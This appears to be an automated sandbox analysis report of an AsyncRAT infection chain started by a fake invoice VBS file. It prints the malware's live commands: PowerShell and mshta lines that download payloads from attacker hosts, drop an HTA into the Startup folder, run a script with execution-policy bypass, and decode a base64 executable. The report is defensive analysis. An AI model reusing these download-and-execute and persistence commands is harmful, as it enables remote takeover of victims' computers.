2d 6e 6f 65 78 69 74 20 2d 65 78 65 63 20 62 79 70 61 73 73 20 2d 66 69 6c 65 20 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 4d 69 63 72 6f 73 6f 66 74 2e 70 73 31 22 0d 0a 7d 0d 0a 49 45 58 20 48 42 61 72
                                                              Data Ascii: Function HBar{$p = 'C:\Users\' + $env:UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'$ps1 = 'C:\Users\Public\'start-sleep -s 7if((New-Object System.Net.WebClient).DownloadFile('https://ia801503.us.archive.org/13/items/startup_20210219/Startup.txt', $p + 'Run.hta')){}start-sleep -s 7if((New-Object System.Net.WebClient).DownloadFile('http://ahmedadel.work/cairo/Server.txt' , $ps1 + 'Microsoft.ps1')){}start-sleep -s 7powershell -windo 1 -noexit -exec bypass -file "C:\Users\Public\Microsoft.ps1"}IEX HBar


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              2192.168.2.449721212.64.222.17280C:\Windows\System32\mshta.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 27, 2021 19:18:21.733598948 CET664OUTGET /cairo/Server.txt HTTP/1.1
                                                              Host: ahmedadel.work
                                                              Connection: Keep-Alive
                                                              Feb 27, 2021 19:18:21.807632923 CET666INHTTP/1.1 200 OK
                                                              Date: Sat, 27 Feb 2021 19:01:11 GMT
                                                              Server: Apache
                                                              Last-Modified: Fri, 26 Feb 2021 14:14:58 GMT
                                                              ETag: "378df-5bc3de49f8e36"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 227551
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/plain; charset=UTF-8
                                                              Data Raw: 5b 42 79 74 65 5b 5d 5d 24 48 31 3d 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 27 54 56 71 51 7c 7c 4d 7c 7c 7c 7c 45 7c 7c 7c 7c 2f 2f 38 7c 7c 4c 67 7c 7c 7c 7c 7c 7c 7c 7c 7c 51 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 67 7c 7c 7c 7c 7c 34 66 75 67 34 7c 74 7c 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 7c 7c 7c 7c 7c 7c 7c 7c 7c 42 51 52 51 7c 7c 54 7c 45 45 7c 48 58 68 63 38 38 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 4f 7c 7c 44 69 45 4c 7c 51 59 7c 7c 42 49 42 7c 7c 7c 49 7c 7c 7c 7c 7c 7c 7c 7c 58 6a 45 42 7c 7c 7c 67 7c 7c 7c 7c 51 7c 45 7c 7c 7c 42 7c 7c 7c 7c 67 7c 7c 7c 7c 7c 67 7c 7c 42 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 45 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 43 67 7c 51 7c 7c 42 7c 7c 7c 7c 7c 7c 7c 7c 7c 4d 7c 51 49 55 7c 7c 42 7c 7c 7c 42 7c 7c 7c 7c 7c 7c 45 7c 7c 7c 45 7c 7c 7c 7c 7c 7c 7c 7c 7c 38 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 42 7c 78 7c 51 42 4c 7c 7c 7c 7c 7c 47 7c 42 7c 46 51 44 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 49 7c 42 7c 7c 77 7c 7c 7c 44 48 4d 7c 45 7c 48 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 49 7c 7c 7c 43 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 43 43 7c 7c 7c 45 67 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 43 35 30 5a 58 68 30 7c 7c 7c 7c 5a 42 45 42 7c 7c 7c 67 7c 7c 7c 7c 45 67 45 7c 7c 7c 51 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 43 7c 7c 7c 47 7c 75 63 32 52 68 64 47 45 7c 7c 4f 67 42 7c 7c 7c 7c 51 7c 45 7c 7c 7c 49 7c 7c 7c 7c 57 7c 51 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 42 7c 7c 7c 44 7c 4c 6e 4a 7a 63 6d 4d 7c 7c 7c 42 55 7c 77 7c 7c 7c 47 7c 42 7c 7c 7c 45 7c 7c 7c 7c 47 7c 45 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 51 7c 7c 7c 51 43 35 79 5a 57 78 76 59 77 7c 7c 44 7c 7c 7c 7c 7c 43 7c 7c 51 7c 7c 7c 67 7c 7c 7c 42 77 42 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 45 7c 7c 7c 45 49 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c
                                                              Data Ascii: [Byte[]]$H1=[System.Convert]::FromBase64String('TVqQ||M||||E||||//8||Lg|||||||||Q|||||||||||||||||||||||||||||||||||||||||||||||g|||||4fug4|t|nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ|||||||||BQRQ||T|EE|HXhc88||||||||||O||DiEL|QY||BIB|||I||||||||XjEB|||g||||Q|E|||B||||g|||||g||B||||||||||E||||||||||Cg|Q||B|||||||||M|QIU||B|||B||||||E|||E|||||||||8||||||||||||||B|x|QBL|||||G|B|FQD|||||||||||||||||||||||||I|B||w|||DHM|E|H|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||I|||C|||||||||||||||CC|||Eg||||||||||||||C50ZXh0||||ZBEB|||g||||EgE|||Q||||||||||||||||||C|||G|uc2RhdGE||OgB||||Q|E|||I||||W|Q||||||||||||||||B|||D|LnJzcmM|||BU|w|||G|B|||E||||G|E|||||||||||||||||Q|||QC5yZWxvYw||D|||||C||Q|||g|||BwB|||||||||||||||||E|||EI|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
                                                              Feb 27, 2021 19:18:21.807674885 CET667INData Raw: 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c
                                                              Data Ascii: |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
                                                              Feb 27, 2021 19:18:21.807723999 CET668INData Raw: 6f 7c 2f 67 77 71 7c 45 55 2b 7c 7c 7c 7c 4b 7c 49 7c 7c 4f 7c 45 7c 7c 43 6a 2f 76 2f 2f 6a 77 4d 7c 7c 46 38 44 7c 7c 44 47 42 7c 7c 7c 4f 51 45 7c 7c 4c 38 44 7c 7c 42 37 42 7c 7c 7c 42 7c 49 7c 7c 47 49 43 7c 7c 7c 4d 7c 7c 7c 7c 4e 7c 4d 7c
                                                              Data Ascii: o|/gwq|EU+||||K|I||O|E||Cj/v//jwM||F8D||DGB|||OQE||L8D||B7B|||B|I||GIC|||M||||N|M||Kw|||Bh||||Q|I||NQ||||C|w||agQ||CgB||Bz|g||7v7//9|D||Cd|g||cg|||EoB||BZB|||tP7//4wE||D2|w||CwU||GkB||D9||||P||||BwD||DD|Q||s|I||OEB||Cx|w||Q|I||NkC||BO|w||f|M||
                                                              Feb 27, 2021 19:18:21.807766914 CET670INData Raw: 7c 44 67 55 2f 50 2f 2f 45 51 59 57 49 7c 49 7c 7c 51 43 65 49 44 51 7c 7c 7c 7c 34 7c 66 7a 2f 2f 77 4d 52 42 42 38 71 57 42 38 71 57 43 67 65 7c 7c 7c 47 45 77 6f 67 50 7c 7c 7c 7c 44 6a 6e 2b 2f 2f 2f 63 78 4d 7c 7c 7c 70 36 7c 42 45 47 48 79
                                                              Data Ascii: |DgU/P//EQYWI|I||QCeIDQ||||4|fz//wMRBB8qWB8qWCge|||GEwogP||||Djn+///cxM|||p6|BEGHymUEwcgCw|||DjP+///cxM|||p6EQQg+||||FgTDS|r||||OLX7//8RFzkQ||||I|Q||||4pPv//3MT|||KegMRBB9QWCge|||GEwkgEQ|||DiH+///ESI5DwE||C|c||||Fjl1+///JgMRDR5YHlgoHg||BhMcIDM
                                                              Feb 27, 2021 19:18:21.807806015 CET671INData Raw: 6b 52 7c 7c 7c 7c 49 7c 63 7c 7c 7c 7c 34 70 2f 2f 2f 2f 77 42 7a 46 7c 7c 7c 43 6e 6f 71 7c 42 4d 77 7c 77 7c 66 7c 7c 7c 7c 42 7c 7c 7c 45 53 73 4a 4b 4f 47 51 56 46 63 55 46 70 6f 6d 46 69 33 35 7c 7c 49 44 67 51 45 7c 7c 42 73 44 43 6a 67 7c
                                                              Data Ascii: kR||||I|c||||4p////wBzF|||Cnoq|BMw|w|f||||B|||ESsJKOGQVFcUFpomFi35||IDgQE||BsDCjg|||||Bio|Ez|G|GIB|||F|||RKwkojX5pWBQWmiYWLfkg|Q|||Djt||||FgsgBQ|||CgY|||GOdw||||m|BaNHw|||QogC||||CgY|||GOcQ||||mBxZEog|||CgY|||GKBc|||Y5Ww|||CYg|g|||Dii|||||HMU|
                                                              Feb 27, 2021 19:18:21.807846069 CET673INData Raw: 5a 69 73 4a 4b 4b 7c 51 49 31 30 55 46 70 6f 6d 46 69 33 35 7c 50 34 4a 7c 7c 7c 6f 48 77 7c 7c 43 69 6f 7c 7c 47 59 72 43 53 67 76 65 33 64 57 46 42 61 61 4a 68 59 74 2b 51 44 2b 43 51 7c 7c 4b 43 7c 7c 7c 7c 6f 71 7c 7c 42 6d 4b 77 6b 6f 37 59
                                                              Data Ascii: ZisJKK|QI10UFpomFi35|P4J|||oHw||Cio||GYrCSgve3dWFBaaJhYt+QD+CQ||KC||||oq||BmKwko7Y9cbBQWmiYWLfk|/gk||Cgh|||KKg||YisJKDwIfFcUFpomFi35/gk||G8i|||KKg|||GIrCSjNkkVhFBaaJhYt+f4J||BvIw||Cio|||CCKwkoMMxqWhQWmiYWLfn+CQ||/gkB|P4J|gBvJ|||Cio|||BmKwkojzo
                                                              Feb 27, 2021 19:18:21.807887077 CET674INData Raw: 6f 71 7c 7c 7c 7c 51 69 73 4a 4b 44 2f 43 59 32 51 55 46 70 6f 6d 46 69 33 35 46 79 6f 7c 7c 7c 42 43 4b 77 6b 6f 33 75 51 44 51 52 51 57 6d 69 59 57 4c 66 6b 57 4b 67 7c 7c 7c 46 59 72 43 53 67 31 6f 68 52 68 46 42 61 61 4a 68 59 74 2b 51 7c 6f
                                                              Data Ascii: oq||||QisJKD/CY2QUFpomFi35Fyo|||BCKwko3uQDQRQWmiYWLfkWKg|||FYrCSg1ohRhFBaaJhYt+Q|op|||Bio||GIrCSgj5yk0FBaaJhYt+f4J|||oLg||Cio|||BWKwko8|5RWBQWmiYWLfk|KLg|||Yq||BmKwkod|5paxQWmiYWLfk|/gk||Cip|||GKg||ZisJKPtQLzIUFpomFi35|P4J|||oG|||Cio||GIrCSivS
                                                              Feb 27, 2021 19:18:21.807924986 CET675INData Raw: 42 69 68 46 7c 7c 7c 47 45 67 6b 52 43 68 45 4c 45 51 77 61 48 52 73 47 4b 45 55 7c 7c 7c 59 53 44 42 45 4a 45 51 6f 52 43 78 73 66 44 42 77 47 4b 45 55 7c 7c 7c 59 53 43 78 45 4d 45 51 6b 52 43 68 77 66 45 52 30 47 4b 45 55 7c 7c 7c 59 53 43 68
                                                              Data Ascii: BihF|||GEgkRChELEQwaHRsGKEU|||YSDBEJEQoRCxsfDBwGKEU|||YSCxEMEQkRChwfER0GKEU|||YSChELEQwRCR0fFh4GKEU|||YSCREKEQsRDB4dHwkGKEU|||YSDBEJEQoRCx8JHwwfCgYoRQ||BhILEQwRCREKHwofER8LBihF|||GEgoRCxEMEQkfCx8WHwwGKEU|||YSCREKEQsRDB8MHR8NBihF|||GEgwRCREKEQs
                                                              Feb 27, 2021 19:18:21.807965040 CET677INData Raw: 45 4b 45 51 73 52 44 42 34 63 48 7a 6b 47 4b 45 67 7c 7c 7c 59 53 44 42 45 4a 45 51 6f 52 43 78 38 50 48 77 6f 66 4f 67 59 6f 53 7c 7c 7c 42 68 49 4c 45 51 77 52 43 52 45 4b 48 42 38 50 48 7a 73 47 4b 45 67 7c 7c 7c 59 53 43 68 45 4c 45 51 77 52
                                                              Data Ascii: EKEQsRDB4cHzkGKEg|||YSDBEJEQoRCx8PHwofOgYoS|||BhILEQwRCREKHB8PHzsGKEg|||YSChELEQwRCR8NHxUfP|YoS|||BhIJEQoRCxEMGhwfPQYoS|||BhIMEQkRChELHwsfCh8+BihI|||GEgsRDBEJEQoYHw8fPwYoS|||BhIKEQsRDBEJHwkfFR9|BihI|||GEQkREFgTCREKERFYEwoRCxESWBMLEQwRE1gTDBENF
                                                              Feb 27, 2021 19:18:21.808002949 CET678INData Raw: 48 77 30 52 42 42 79 52 6e 7c 6b 66 44 78 45 45 48 5a 47 63 4b 45 73 7c 7c 7c 59 54 42 52 45 46 46 32 39 46 7c 7c 7c 4b 45 51 55 49 43 57 39 47 7c 7c 7c 4b 45 77 5a 7a 52 77 7c 7c 43 68 4d 48 45 51 63 52 42 68 64 7a 53 7c 7c 7c 43 68 4d 49 45 51
                                                              Data Ascii: Hw0RBByRn|kfDxEEHZGcKEs|||YTBREFF29F|||KEQUICW9G|||KEwZzRw||ChMHEQcRBhdzS|||ChMIEQgHFgeOaW9J|||KEQhvSg||ChEHb0s|||q|KQ||BBEHb0w|||oRCG9M|||KBm9N|||Kfio|||SOaToZ||||fic|||QoVQ||Bm9O|||KKFY|||a|Kg||BBYTCRqNHw|||RMLEQsWfik|||QCkZwRCxd+KQ||B|IXWJG
                                                              Feb 27, 2021 19:18:21.881756067 CET681INData Raw: 67 7c 7c 43 73 67 7c 7c 7c 74 47 77 7c 7c 31 42 77 7c 7c 4f 63 50 7c 7c 42 5a 45 7c 7c 7c 36 53 6f 7c 7c 48 59 4b 7c 7c 42 55 44 67 7c 7c 48 69 6b 7c 7c 48 63 52 7c 7c 7c 66 7c 51 7c 7c 51 43 6f 7c 7c 4c 7c 47 7c 7c 7c 68 4a 7c 7c 7c 4b 42 55 7c
                                                              Data Ascii: g||Csg|||tGw||1Bw||OcP||BZE|||6So||HYK||BUDg||Hik||HcR|||f|Q||QCo||L|G|||hJ|||KBU||B4j||BYC|||WyY||HkP||D8LQ||IxQ||E0f||CYFQ||bwI||FUW||DCI|||PxQ||P0J||BGBw||Ly8||GEc|||3BQ||mwc||FYF||C9|Q||dQs||LYS||BlBw||two||GQb||CwLg||3RQ||JUc||BhDw||rSo||


                                                              HTTPS Packets

                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                              Feb 27, 2021 19:18:14.089788914 CET207.241.228.153443192.168.2.449715CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USMon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                              CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                              CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                              OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                              Code Manipulations

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              Analysis Process: wscript.exe PID: 5924 Parent PID: 3424

                                                              General

                                                              Start time:19:17:59
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice-ID-(882451).vbs'
                                                              Imagebase:0x7ff79a710000
                                                              File size:163840 bytes
                                                              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: mshta.exe PID: 1424 Parent PID: 5924

                                                              General

                                                              Start time:19:18:00
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\System32\mshta.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Windows\System32\mshta.exe' http://ahmedadel.work/cairo/Encoding.txt
                                                              Imagebase:0x7ff7693f0000
                                                              File size:14848 bytes
                                                              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              Chronological Activities

                                                              Analysis Process: powershell.exe PID: 1320 Parent PID: 1424

                                                              General

                                                              Start time:19:18:02
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                                              Imagebase:0x7ff7bedd0000
                                                              File size:447488 bytes
                                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp, Author: Florian Roth
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: conhost.exe PID: 2932 Parent PID: 1320

                                                              General

                                                              Start time:19:18:03
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff724c50000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: mshta.exe PID: 1260 Parent PID: 3424

                                                              General

                                                              Start time:19:18:25
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                              Imagebase:0xa90000
                                                              File size:13312 bytes
                                                              MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              Chronological Activities

                                                              Analysis Process: powershell.exe PID: 5764 Parent PID: 1260

                                                              General

                                                              Start time:19:18:26
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\Microsoft.ps1
                                                              Imagebase:0x1030000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000005.00000003.745729144.0000000005ADD000.00000004.00000001.sdmp, Author: Florian Roth
                                                              • Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000005.00000002.906772895.0000000006182000.00000004.00000001.sdmp, Author: Florian Roth
                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.913434202.000000000B780000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000003.745955068.0000000005B56000.00000004.00000001.sdmp, Author: Joe Security
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: conhost.exe PID: 5880 Parent PID: 5764

                                                              General

                                                              Start time:19:18:26
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff724c50000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: powershell.exe PID: 2240 Parent PID: 1320

                                                              General

                                                              Start time:19:18:28
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
                                                              Imagebase:0x7ff7bedd0000
                                                              File size:447488 bytes
                                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: aspnet_compiler.exe PID: 2108 Parent PID: 2240

                                                              General

                                                              Start time:19:18:31
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:#cmd
                                                              Imagebase:0x150000
                                                              File size:55400 bytes
                                                              MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              Chronological Activities

                                                              Analysis Process: aspnet_compiler.exe PID: 1296 Parent PID: 2240

                                                              General

                                                              Start time:19:18:31
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:#cmd
                                                              Imagebase:0x930000
                                                              File size:55400 bytes
                                                              MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                              Reputation:moderate

                                                              Chronological Activities

                                                              Analysis Process: aspnet_compiler.exe PID: 3544 Parent PID: 5764

                                                              General

                                                              Start time:19:18:53
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:#cmd
                                                              Imagebase:0xe60000
                                                              File size:55400 bytes
                                                              MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                              Reputation:moderate

                                                              Chronological Activities

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >

                                                                Analysis Process: mshta.exe PID: 1424 Parent PID: 5924 mshta.exeCOMMON

                                                                Executed Functions

                                                                Function 0000024D52410FC1, Relevance: .0, Instructions: 5COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000003.641926399.0000024D52410000.00000010.00000001.sdmp, Offset: 0000024D52410000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
